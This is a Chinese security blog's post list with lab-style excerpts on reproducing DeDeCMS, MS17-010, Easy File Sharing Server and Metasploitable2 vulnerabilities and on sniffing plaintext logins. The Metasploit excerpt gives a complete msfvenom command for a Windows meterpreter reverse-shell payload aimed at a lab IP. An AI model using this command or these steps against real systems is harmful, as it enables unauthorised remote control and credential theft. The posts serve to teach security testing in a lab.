- 博客(9)
- 收藏
- 关注
RSS订阅原创 DeDeCMS 前台任意用户密码修改
1、复现环境PHP 5.6DeDeCMSV5.7SP2 正式版(2018-01-09)使用PHPstudy来搭建网站下载DeDeCMSV5.7SP2后放在该目录下开启会员模式设置注册账号(不要设置安全问题)2、漏洞复现
2021-12-15 08:38:05
619
原创 ms17-010漏洞复现
一、漏洞原理1、简介永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。SMB协议是一个通过网络在共享文件、打印设备、命名管道、邮槽之间操作数据的协议。利用该协议,客户端就可以去访问服务器上的共享文件和目录(增删改查)、打印队列和进程间通信服务等,还可以实现客户端和服务器之间的远程过程子协议的认证传输。Windows的SMB服务处理 SMBv1接收的特殊设计的数据包,发生缓冲区溢出,导致攻击者在目标系统上可以执行任意代码。
2021-12-15 08:35:48
3329
原创 Metasploit应用
1、生成被控端使用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.128 lport=5000 -f exe -o /root/mydir/payload.exe这里我们使用msfvenom来生成一个被控端程序,用于windows平台下的被控端程序:windows/meterpreter/reverse_tc,lhost的值为kali的ip,该程序的保存位置为:/root/payload.exe...
2021-11-07 23:32:20
226
原创 easy file sharing server 的漏洞利用
1、首先在winxp靶机上安装efssetup_2018.zip,并运行2、扫描靶机进行的服务使用nmap进行主动扫描,命令为nmap -sV 192.168.56.131。可以看到靶机的80端口提供的服务为easy file sharing server。3、查找漏洞渗透模块我们可以用“searchsploit"命令在kali中查找所需要的渗透模块。我们这里以这个漏洞渗透模块为例,这个脚本使用python写的,利用溢出漏洞实现了在靶机执行计算器程序。...
2021-11-07 19:02:39
450
原创 Metasploitable2中FTP漏洞
1、查看靶机的ipMetasploitable2默认的用户名是 :msfadmin 密码是: msfadmin登陆之后使用ip addr查看ip地址靶机的ip为192.168.43.253
2021-11-04 21:27:36
403
原创 wireshark 抓取明文账号与密码
1、获取目标网站的ipwin+R打开cmd,使用ping命令,来获取目标网站的ip2、启动wireshark,过滤掉无关信息过滤器填写http and ip.addr==目标网站的ip3、登录账号密码4、查看账号密码这样就可以看到目标网站的中的账号密码了。目标网站对账号密码不进行加密,很容易导致用户的隐私信息泄露。...
2021-10-31 17:22:10
1626
原创 Linux系统常用操作命令(以kali Linux为例)
创建文件和目录使用touch命令可创建一个文件名为“myfile”的文件,如图使用“mkdir 目录名”命令在当前目录下创建名为“mydir”的子目录,如图使用”ls“命令查看文件和目录是否存在。文件的复制和移动和删除使用”cp 源文件 目标文件“命令可进行文件复制,如图使用“mv 源文件 目标文件”命令可进行文件的移动使用“rm 文件名”可以删除文件,用“rm -r 目录”可删除目录注意:...
2021-10-31 16:53:48
909
原创 ping的详解
ping首先看看百度的解释:ping (Packet Internet Groper)是一种因特网包探索器,用于测试网络连接量的程序。Ping是工作在TCP/IP网络体系结构中应用层的一个服务命令, 主要是向特定的目的主机发送ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo请求报文,测试目的站是否可达及了解其有关状态。简单来说,ping可以向一个网络地址发送探测包,看该网络地址是否有响应并统计响应时间,以此测试网络。。...
2021-10-17 22:32:26
3399
原创 等保2.0
等保1.0在1.0的初期,企业只要有安全意识,能开始做等保,开始测评就已经很不错了;到了中期,整体防护,渗透测试,合规开始等于安全。行业等级保护全面开展,等保开始逐渐的深入人心;再到1.0的后期,无论是企业层面还是国家层面,都更注重实质性的安全。主动防御、态势感知、攻防对抗等安全手段开始流行,云安、大数据、工控安全和移动安全开始占领主要趋势。等保2.0等保2.0全称网络安全等级保护2.0制度,是我国网络安全领域的基本国策、基本制度。等级保护标准在1.0时代标准的基础上,注重主动防御,从被动防御..
2021-10-11 13:12:56
3424
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人